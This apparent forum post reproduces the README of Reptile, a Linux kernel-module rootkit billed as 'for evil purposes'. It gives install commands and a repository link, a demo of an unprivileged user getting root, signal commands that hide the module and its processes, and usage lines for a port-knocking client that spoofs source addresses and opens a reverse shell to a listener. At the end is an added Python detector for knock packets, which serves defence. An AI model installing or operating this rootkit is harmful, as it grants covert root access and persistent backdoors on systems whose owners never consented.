OKQL
Posted October 29, 2017

Reptile

Reptile is an LKM rootkit for evil purposes. If you are searching for stuff only for study purposes, see the [link hidden].

Features

- Give root to unprivileged users
- Hide files and directories
- Hide files contents
- Hide processes
- Hide itself
- Boot persistence
- Heaven's door - An ICMP/UDP port-knocking backdoor
- Client to knock on heaven's door

Install

    apt-get install linux-headers-$(uname -r)
    git clone https://github.com/f0rb1dd3n/Reptile.git
    cd Reptile
    ./installer.sh install

Usage

Binaries will be copied to the /reptile folder, which will be hidden by Reptile.

Getting root privileges

    hax@Debian:~$ id
    uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
    hax@Debian:~$ /reptile/r00t
    You got super powers!

    root@Debian:/home/hax# id
    uid=0(root) gid=0(root) groups=0(root)

Hiding

- Hide/unhide reptile module: kill -50 0
- Hide/unhide process: kill -49 <PID>
- Hide files contents: all content between the tags will be hidden

Example:

    #<reptile>
    content to hide
    #</reptile>

Knocking on heaven's door

Heaven's door is an ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:

    Knock Knock on Heaven's Door
    Writen by: F0rb1dd3n

    Usage: ./knock_on_heaven <args>

    -x  protocol (ICMP/UDP)
    -s  Source IP address (You can spoof)
    -t  Target IP address
    -p  Source Port
    -q  Target Port
    -d  Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
    -l  Launch listener

    [!] ICMP doesn't need ports

    ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
    UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l

Disclaimer

Some functions of this module are based on other rootkits. Please see the references!

References

- “LKM HACKING”, The Hackers Choice (THC), 1999
- “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997

Contributing

I am open to receiving contributions. If you can contribute to this project, discuss the contribution via e-mail or open an issue, fork the project and make a pull request. I will evaluate pull requests and merge them into the project.

Download

    git clone https://github.com/f0rb1dd3n/Reptile.git
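For defenders, the knock data format shown in the client's help text can be matched in captured traffic. The following is an added example, not part of the original post or of the Reptile project: a Python matcher that flags IPv4 ICMP/UDP packets whose payload has the "<key> <reverse IP> <reverse Port>" shape. It assumes the string travels verbatim as the packet payload; the function names, the key EXAMPLEKEY and the sample packets are constructed for illustration.

```python
import ipaddress
import re
import struct

# Assumption: the client's -d string "<key> <reverse IP> <reverse Port>" is the
# raw ICMP/UDP payload, and both L4 headers are 8 bytes (ICMP echo, UDP).
KNOCK_RE = re.compile(rb"(\S{1,64}) (\d{1,3}(?:\.\d{1,3}){3}) (\d{1,5})[\x00\s]*\Z")

def l4_payload(pkt: bytes):
    """Return (proto, src, dst, payload) for an unfragmented IPv4 ICMP/UDP packet."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len, _ident, frag = struct.unpack("!HHH", pkt[2:8])
    if ihl < 20 or pkt[9] not in (1, 17) or frag & 0x3FFF:
        return None  # bad header, other protocol, or a fragment (MF bit / offset set)
    end = min(total_len, len(pkt))  # drop link-layer padding, tolerate truncation
    if end < ihl + 8:
        return None
    src, dst = (str(ipaddress.IPv4Address(pkt[i:i + 4])) for i in (12, 16))
    return ("icmp" if pkt[9] == 1 else "udp", src, dst, pkt[ihl + 8:end])

def find_knock(pkt: bytes):
    """Return a finding dict if the payload looks like a knock, else None."""
    parsed = l4_payload(pkt)
    match = parsed and KNOCK_RE.match(parsed[3])
    if not match:
        return None
    try:
        rev_ip = str(ipaddress.IPv4Address(match.group(2).decode()))
    except ValueError:
        return None  # dotted string that is not a valid address, e.g. 999.1.1.1
    port = int(match.group(3))
    if not 1 <= port <= 65535:
        return None
    proto, src, dst, _ = parsed
    # The client can spoof src (-s), so reverse_ip is the stronger indicator.
    return {"proto": proto, "src": src, "dst": dst,
            "reverse_ip": rev_ip, "reverse_port": port}

# Constructed sample packets (IPv4 + 8-byte L4 header + payload), not captured traffic.
KNOCK = b"EXAMPLEKEY 192.168.0.4 4444"  # constructed key; IP/port as in the usage lines
SAMPLES = [
    bytes.fromhex("45000037 00000000 40010000 c0a80002 c0a80003 08000000 00000000") + KNOCK,
    bytes.fromhex("45000037 00000000 40110000 c0a80002 c0a80003 00350035 00230000") + KNOCK,
    bytes.fromhex("4500003c 00000000 40010000 c0a80002 c0a80003 08000000 00000000")
    + b"abcdefghijklmnopqrstuvwabcdefghi",  # ordinary ping payload
]

def scan(packets):
    return [hit for hit in map(find_knock, packets) if hit]
```

The match is a heuristic on payload shape only, so hits are leads for triage rather than proof of a knock.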